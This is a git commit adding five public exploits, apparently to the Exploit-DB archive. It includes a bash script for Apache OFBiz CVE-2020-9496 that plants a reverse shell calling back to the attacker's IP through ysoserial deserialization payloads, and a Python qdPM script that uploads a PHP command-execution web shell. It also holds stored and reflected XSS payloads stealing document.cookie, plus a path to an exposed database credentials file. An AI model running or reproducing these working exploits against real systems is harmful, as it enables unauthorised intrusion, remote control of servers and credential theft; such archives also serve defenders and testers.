DB: 2021-08-05

6 changes to exploits/shellcodes WordPress Plugin WP Customize Login 1.1 - 'Change Logo Title' Stored Cross-Site Scripting (XSS) qdPM 9.1 - Remote Code Execution (RCE) (Authenticated) qdPM 9.2 - DB Connection String and Password Exposure (Unauthenticated) Client Management System 1.1 - 'cname' Stored Cross-site scripting (XSS) ApacheOfBiz 17.12.01 - Remote Command Execution (RCE) via Unsafe Deserialization of XMLRPC arguments
2021-08-05 05:01:56 +00:00 · 2021-08-05 05:01:56 +00:00 · 2bcb3e5c5e
commit 2bcb3e5c5e
parent d47bcea78d
7 changed files with 283 additions and 0 deletions
--- a/exploits/java/webapps/50178.sh
+++ b/exploits/java/webapps/50178.sh
@ -0,0 +1,78 @@
+# Exploit Title: ApacheOfBiz 17.12.01 - Remote Command Execution (RCE) via Unsafe Deserialization of XMLRPC arguments
+# Date: 2021-08-04
+# Exploit Author: Álvaro Muñoz, Adrián Díaz (s4dbrd)
+# Vendor Homepage: https://ofbiz.apache.org/index.html
+# Software Link: https://archive.apache.org/dist/ofbiz/apache-ofbiz-17.12.01.zip
+# Version: 17.12.01
+# Tested on: Linux
+
+# CVE : CVE-2020-9496
+
+# Reference: https://securitylab.github.com/advisories/GHSL-2020-069-apache_ofbiz/
+
+# Description: This CVE was discovered by Alvaro Muñoz, but I have created this POC to automate the process and the necessary requests to successfully exploit it and get RCE.
+
+#!/usr/bin/env bash
+ 
+# Because the 2 xmlrpc related requets in webtools (xmlrpc and ping) are not using authentication they are vulnerable to unsafe deserialization. 
+# This issue was reported to the security team by Alvaro Munoz pwntester@github.com from the GitHub Security Lab team.
+#
+# This vulnerability exists due to Java serialization issues when processing requests sent to /webtools/control/xmlrpc.
+# A remote unauthenticated attacker can exploit this vulnerability by sending a crafted request. Successful exploitation would result in arbitrary code execution.
+#
+# Steps to exploit:
+# 
+# Step 1: Host HTTP Service with python3 (sudo python3 -m http.server 80)
+# Step 2: Start nc listener (Recommended 8001).
+# Step 3: Run the exploit.
+ 
+ 
+url='https://127.0.0.1' # CHANGE THIS
+port=8443 # CHANGE THIS
+ 
+function helpPanel(){
+    echo -e "\nUsage:"
+    echo -e "\t[-i] Attacker's IP"
+    echo -e "\t[-p] Attacker's Port"
+    echo -e "\t[-h] Show help pannel"
+    exit 1
+}
+ 
+ 
+function ctrl_c(){
+    echo -e "\n\n[!] Exiting...\n"
+    exit 1
+}
+# Ctrl + C
+trap ctrl_c INT
+ 
+function webRequest(){
+    echo -e "\n[*] Creating a shell file with bash\n"
+    echo -e "#!/bin/bash\n/bin/bash -i >& /dev/tcp/$ip/$ncport 0>&1" > shell.sh
+    echo -e "[*] Downloading YsoSerial JAR File\n"
+    wget -q https://jitpack.io/com/github/frohoff/ysoserial/master-d367e379d9-1/ysoserial-master-d367e379d9-1.jar
+    echo -e "[*] Generating a JAR payload\n"
+    payload=$(java -jar ysoserial-master-d367e379d9-1.jar CommonsBeanutils1 "wget $ip/shell.sh -O /tmp/shell.sh" | base64 | tr -d "\n")
+    echo -e "[*] Sending malicious shell to server...\n" && sleep 0.5
+    curl -s $url:$port/webtools/control/xmlrpc -X POST -d "<?xml version='1.0'?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value><struct><member><name>test</name><value><serializable xmlns='http://ws.apache.org/xmlrpc/namespaces/extensions'>$payload</serializable></value></member></struct></value></param></params></methodCall>" -k  -H 'Content-Type:application/xml' &>/dev/null
+    echo -e "[*] Generating a second JAR payload"
+    payload2=$(java -jar ysoserial-master-d367e379d9-1.jar CommonsBeanutils1 "bash /tmp/shell.sh" | base64 | tr -d "\n")
+    echo -e "\n[*] Executing the payload in the server...\n" && sleep 0.5
+    curl -s $url:$port/webtools/control/xmlrpc -X POST -d "<?xml version='1.0'?><methodCall><methodName>ProjectDiscovery</methodName><params><param><value><struct><member><name>test</name><value><serializable xmlns='http://ws.apache.org/xmlrpc/namespaces/extensions'>$payload2</serializable></value></member></struct></value></param></params></methodCall>" -k  -H 'Content-Type:application/xml' &>/dev/null
+    echo -e "\n[*]Deleting Files..."
+    rm ysoserial-master-d367e379d9-1.jar && rm shell.sh
+}
+ 
+declare -i parameter_enable=0; while getopts ":i:p:h:" arg; do
+    case $arg in
+        i) ip=$OPTARG; let parameter_enable+=1;;
+        p) ncport=$OPTARG; let parameter_enable+=1;;
+        h) helpPanel;;
+    esac
+done
+ 
+if [ $parameter_enable -ne 2 ]; then
+    helpPanel
+else
+    webRequest
+fi
--- a/exploits/php/webapps/49352.txt
+++ b/exploits/php/webapps/49352.txt
@ -8,6 +8,7 @@
 # Affected Version: Version 1
 # Patched Version: Unpatched
 # Category: Web Application
+# CVE: CVE-2021-25791

 Step 1: Create a new user then login
 Step 2: Click on "Register" page to register a room.
--- a/exploits/php/webapps/50174.txt
+++ b/exploits/php/webapps/50174.txt
@ -0,0 +1,15 @@
+# Exploit Title: WordPress Plugin WP Customize Login 1.1 - 'Change Logo Title' Stored Cross-Site Scripting (XSS)
+# Date: 2021-08-03
+# Exploit Author: Aryan Chehreghani
+# Software Link: https://wordpress.org/plugins/customize-login/
+# Version: 1.1
+# Tested on: Windows 10
+
+How to Reproduce this Vulnerability:
+
+1. Install WordPress 5.8
+2. Install and activate  WP Customize Login
+3. Navigate to Customize Login under Settings Tab >>  enter the XSS payload into the Change Logo Title input field.
+4. Click Save Changes.
+5. You will observe that the payload successfully got stored into the database and when you are triggering the same functionality at that time JavaScript payload is executing successfully and we are getting a pop-up.
+6. Payload Used: "><script>alert(document.cookie)</script>
--- a/exploits/php/webapps/50175.py
+++ b/exploits/php/webapps/50175.py
@ -0,0 +1,112 @@
+# Exploit Title: qdPM 9.1 - Remote Code Execution (RCE) (Authenticated)
+# Google Dork: intitle:qdPM 9.1. Copyright © 2020 qdpm.net
+# Date: 2021-08-03
+# Original Exploit Author: Rishal Dwivedi (Loginsoft)
+# Original ExploitDB ID: 47954
+# Exploit Author: Leon Trappett (thepcn3rd)
+# Vendor Homepage: http://qdpm.net/
+# Software Link: http://qdpm.net/download-qdpm-free-project-management
+# Version: <=1.9.1
+# Tested on: Ubuntu Server 20.04 (Python 3.9.2)
+# CVE : CVE-2020-7246
+# Exploit written in Python 3.9.2
+# Tested Environment - Ubuntu Server 20.04 LTS
+# Path Traversal + Remote Code Execution
+
+#!/usr/bin/python3
+
+import sys
+import requests
+from lxml import html
+from argparse import ArgumentParser
+
+session_requests = requests.session()
+
+def multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME, uservar):
+    request_1 = {
+        'sf_method': (None, 'put'),
+        'users[id]': (None, userid[-1]),
+        'users[photo_preview]': (None, uservar),
+        'users[_csrf_token]': (None, csrftoken_[-1]),
+        'users[name]': (None, username[-1]),
+        'users[new_password]': (None, ''),
+        'users[email]': (None, EMAIL),
+        'extra_fields[9]': (None, ''),
+        'users[remove_photo]': (None, '1'),
+        }
+    return request_1
+
+
+def req(userid, username, csrftoken_, EMAIL, HOSTNAME):
+    request_1 = multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME,
+'.htaccess')
+    new = session_requests.post(HOSTNAME + 'index.php/myAccount/update',
+files=request_1)
+    request_2 = multifrm(userid, username, csrftoken_, EMAIL, HOSTNAME,
+'../.htaccess')
+    new1 = session_requests.post(HOSTNAME + 'index.php/myAccount/update',
+files=request_2)
+    request_3 = {
+        'sf_method': (None, 'put'),
+        'users[id]': (None, userid[-1]),
+        'users[photo_preview]': (None, ''),
+        'users[_csrf_token]': (None, csrftoken_[-1]),
+        'users[name]': (None, username[-1]),
+        'users[new_password]': (None, ''),
+        'users[email]': (None, EMAIL),
+        'extra_fields[9]': (None, ''),
+        'users[photo]': ('backdoor.php',
+                         '<?php if(isset($_REQUEST[\'cmd\'])){ echo
+"<pre>"; $cmd = ($_REQUEST[\'cmd\']); system($cmd); echo "</pre>"; die; }?>'
+                         , 'application/octet-stream'),
+        }
+    upload_req = session_requests.post(HOSTNAME +
+'index.php/myAccount/update', files=request_3)
+
+
+def main(HOSTNAME, EMAIL, PASSWORD):
+    url = HOSTNAME + '/index.php/login'
+    result = session_requests.get(url)
+    #print(result.text)
+    login_tree = html.fromstring(result.text)
+    authenticity_token =
+list(set(login_tree.xpath("//input[@name='login[_csrf_token]']/@value")))[0]
+    payload = {'login[email]': EMAIL, 'login[password]': PASSWORD,
+'login[_csrf_token]': authenticity_token}
+    result = session_requests.post(HOSTNAME + '/index.php/login',
+data=payload, headers=dict(referer=HOSTNAME + '/index.php/login'))
+    # The designated admin account does not have a myAccount page
+    account_page = session_requests.get(HOSTNAME + 'index.php/myAccount')
+    account_tree = html.fromstring(account_page.content)
+    userid = account_tree.xpath("//input[@name='users[id]']/@value")
+    username = account_tree.xpath("//input[@name='users[name]']/@value")
+    csrftoken_ =
+account_tree.xpath("//input[@name='users[_csrf_token]']/@value")
+    req(userid, username, csrftoken_, EMAIL, HOSTNAME)
+    get_file = session_requests.get(HOSTNAME + 'index.php/myAccount')
+    final_tree = html.fromstring(get_file.content)
+    backdoor =
+final_tree.xpath("//input[@name='users[photo_preview]']/@value")
+    print('Backdoor uploaded at - > ' + HOSTNAME + '/uploads/users/' +
+backdoor[-1] + '?cmd=whoami')
+
+
+if __name__ == '__main__':
+    print("You are not able to use the designated admin account because
+they do not have a myAccount page.\n")
+    parser = ArgumentParser(description='qdmp - Path traversal + RCE
+Exploit')
+    parser.add_argument('-url', '--host', dest='hostname', help='Project
+URL')
+    parser.add_argument('-u', '--email', dest='email', help='User email
+(Any privilege account)')
+    parser.add_argument('-p', '--password', dest='password', help='User
+password')
+    args = parser.parse_args()
+    # Added detection if the arguments are passed and populated, if not
+display the arguments
+    if  (len(sys.argv) > 1 and isinstance(args.hostname, str) and
+isinstance(args.email, str) and isinstance(args.password, str)):
+            main(args.hostname, args.email, args.password)
+    else:
+        parser.print_help()
--- a/exploits/php/webapps/50176.txt
+++ b/exploits/php/webapps/50176.txt
@ -0,0 +1,9 @@
+# Exploit Title: qdPM 9.2 - DB Connection String and Password Exposure (Unauthenticated)
+# Date: 03/08/2021
+# Exploit Author: Leon Trappett (thepcn3rd)
+# Vendor Homepage: https://qdpm.net/
+# Software Link: https://sourceforge.net/projects/qdpm/files/latest/download
+# Version: 9.2
+# Tested on: Ubuntu 20.04 Apache2 Server running PHP 7.4
+
+The password and connection string for the database are stored in a yml file. To access the yml file you can go to http://<website>/core/config/databases.yml file and download.
--- a/exploits/php/webapps/50177.txt
+++ b/exploits/php/webapps/50177.txt
@ -0,0 +1,63 @@
+# Exploit Title: Client Management System 1.1 - 'cname' Stored Cross-site scripting (XSS)
+# Date: 2021-08-04
+# Exploit Author: Mohammad Koochaki
+# Vendor Homepage: https://phpgurukul.com/client-management-system-using-php-mysql/
+# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=10841
+# Version: 1.1
+# Tested on: Ubuntu 20.04.2 LTS, PHP 7.4.3
+
+### This application is prone to a cross-site scripting in the 'searchdata'
+parameter at the following path:
+        - Reflected: http://localhost/admin/search-invoices.php
+        - Reflected: http://localhost/client/search-invoices.php
+        - Stored: http://localhost/client/client-profile.php
+
+### Payloads:
+        - Reflected: </h4><script>alert(document.cookie)</script>
+        - Stored: "><script>alert(document.cookie)</script>Anuj+Kumar
+
+### PoC:
+
+## Reflected:
+POST /admin/search-invoices.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101
+Firefox/78.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 77
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/admin/search-invoices.php
+Cookie: PHPSESSID=o5thu5n92ac58evl71eou90krs
+Upgrade-Insecure-Requests: 1
+DNT: 1
+Sec-GPC: 1
+
+searchdata=</h4><script>alert(document.cookie)</script>&search=
+
+
+## Stored:
+POST /client/client-profile.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101
+Firefox/78.0
+Accept:
+text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 335
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/client/client-profile.php
+Cookie: PHPSESSID=o5thu5n92ac58evl71eou90krs
+Upgrade-Insecure-Requests: 1
+DNT: 1
+Sec-GPC: 1
+
+cname="><script>alert(document.cookie)</script>Anuj+Kumar&comname=PHPGurukul+Programming+Blog&address=New+Delhi&city=New+Delhi&state=Delhi&zcode=110001&wphnumber=9354778033&cellphnumber=9354778033&ophnumber=9354778033&email=phpgurukulofficial%
+40gmail.com&websiteadd=https%3A%2F%2Fphpgurukul.com&notes=New+User&submit=
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -44304,3 +44304,8 @@ id,file,description,date,author,type,platform,port
 50171,exploits/php/webapps/50171.txt,"Online Hotel Reservation System 1.0 - 'Multiple' Cross-site scripting (XSS)",2021-08-02,"Mohammad Koochaki",webapps,php,
 50172,exploits/hardware/webapps/50172.txt,"Panasonic Sanyo CCTV Network Camera 2.03-0x - 'Disable Authentication / Change Password' CSRF",2021-08-02,LiquidWorm,webapps,hardware,
 50173,exploits/php/webapps/50173.py,"Hotel Management System 1.0 - Cross-Site Scripting (XSS) Arbitrary File Upload Remote Code Execution (RCE)",2021-08-03,"Merbin Russel",webapps,php,
+50174,exploits/php/webapps/50174.txt,"WordPress Plugin WP Customize Login 1.1 - 'Change Logo Title' Stored Cross-Site Scripting (XSS)",2021-08-04,"Aryan Chehreghani",webapps,php,
+50175,exploits/php/webapps/50175.py,"qdPM 9.1 - Remote Code Execution (RCE) (Authenticated)",2021-08-04,"Leon Trappett",webapps,php,
+50176,exploits/php/webapps/50176.txt,"qdPM 9.2 - DB Connection String and Password Exposure (Unauthenticated)",2021-08-04,"Leon Trappett",webapps,php,
+50177,exploits/php/webapps/50177.txt,"Client Management System 1.1 - 'cname' Stored Cross-site scripting (XSS)",2021-08-04,"Mohammad Koochaki",webapps,php,
+50178,exploits/java/webapps/50178.sh,"ApacheOfBiz 17.12.01 - Remote Command Execution (RCE) via Unsafe Deserialization of XMLRPC arguments",2021-08-04,"Adrián Díaz",webapps,java,